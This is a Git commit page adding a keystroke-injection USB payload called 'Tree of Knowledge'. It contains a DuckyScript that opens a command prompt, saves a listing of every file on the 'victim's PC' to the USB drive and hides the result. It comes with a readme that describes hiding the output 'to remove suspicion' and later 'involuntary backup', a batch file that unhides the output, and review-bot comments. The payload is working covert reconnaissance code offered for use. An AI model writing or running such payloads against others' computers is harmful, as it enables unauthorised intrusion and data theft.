Gain knowledge from the Tree (#12)

* Useful Reconnaissance Payload 

New payload based on the potential of the "tree" command.

* Update readme.md

* Update readme.md

* Update readme.md

* Update readme.md

* Delete library/payloads/recon/Tree of Knowledge/Bonus directory

I removed the exe

* Update readme.md

* Rename library/payloads/recon/Tree of Knowledge/readme.md to library/payloads/recon/Tree_of_Knowledge/readme.md

* Rename library/payloads/recon/Tree_of_Knowledge/readme.md to library/payloads/recon/Tree of Knowledge/readme.md

* Delete library/payloads/recon/Tree of Knowledge directory

* Gain knowledge from the Tree

Grabs the names of all the files on a victim's PC and hides them from prying eyes.
pull/13/head
Alex007-CyberGuy 2021-08-10 22:24:42 +02:00 committed by GitHub
parent 182a9a1859
commit e84b1b1338
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
3 changed files with 41 additions and 0 deletions


@ -0,0 +1,13 @@
REM Payload created by Alex007-CyberGuy
REM Check the readme.md file for more info on the payload and what is does.
DEFAULTDELAY 250
DELAY 3000
GUI r
DELAY 400
STRING cmd /k "mode con:cols=18 lines=1&color FE&cd %userprofile%&for /f %d in ('wmic volume get driveletter^, label ^| findstr "USB"') do set myd=%d&echo tree /a /f > echotree.cmd"
ENTER
DELAY 350
STRING echotree.cmd > %myd%/%computername%.txt&del echotree.cmd&attrib +h %myd%/%computername%.txt&exit
ENTER
ALT SPACE
STRING n
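
Review bot: The second REM line has a typo ("what is does" should read "what it does"), and neither STRING line carries a comment describing its side effects. The first one changes into %userprofile% and writes echotree.cmd there; the second deletes that file and sets the hidden attribute on %computername%.txt on the drive. A REM line ahead of each stating those file writes would let a reviewer or an authorised tester see what changes on the host and on the drive without decoding the one-liners. The readme requirement that the drive be labeled "USB" also depends on the findstr "USB" match in the first STRING, which is a substring match on the wmic output line, so the comment should say so.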


@ -0,0 +1,26 @@
# Tree of Knowledge
## Intro
This payload copies the names of all the files on a victim's PC, then puts them on a file on the root of the ducky.
In order to remove suspicion, the ducky also automatically hides the gathered recon info so that it can only be seen when the batch file is run.
This whole process is relatively discreet, bug free and can run and finish in a matter of seconds.
This payload is great for the first phase of a Pen Test, since it effortlessly shows you the contents of a victim's PC, which can then later be used for an "involuntary backup".
## Requirements:
- Only works on Windows (7/8/8.1/10)
- Twin Duck firmware must be loaded
- The ducky must be labeled as "USB"
## Viewing files
In order to view the gathered recon file(s), simply put the show.bat program onto the root of the ducky and run it.
## Troubleshooting
1. Experiment with those delays.
2. Make sure that you don't already have a recon file saved from that computer.
3. ALT SPACE doesn't work on some encoders. Try using the java based encoder.
### Tip
The inject.bin still works even if it is marked as "hidden".
That's it folks!
I spent quite long in order optimise this payload, so enjoy!
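
Review bot: The Intro sentence saying the recon info "can only be seen when the batch file is run" overstates what the payload does. The payload only applies attrib +h to the output file, so the file is listed by dir /a and by any file manager set to show hidden items; "marked as hidden" would be accurate. "bug free" also sits oddly next to a Troubleshooting section that lists delay tuning, a clash with an existing recon file and an encoder incompatibility, so I would drop it. Smaller points: "puts them on a file" should be "in a file", and the last line should read "in order to optimise".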


@ -0,0 +1,2 @@
echo off:
attrib *.txt -h /s /d
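
Review bot: The first line, "echo off:", has a trailing colon that looks like a typo; the usual form is "@echo off". On the second line, attrib *.txt -h /s /d is broader than the readme's "view the gathered recon file(s)" suggests: with /s and /d it clears the hidden attribute on every .txt file, and on matching directories, under the folder it is run from. Since the readme says to run it from the root of the drive, that covers the whole drive. Narrowing the pattern to the files the payload actually writes, and dropping /s and /d if they all sit in the root, would keep it from touching unrelated files.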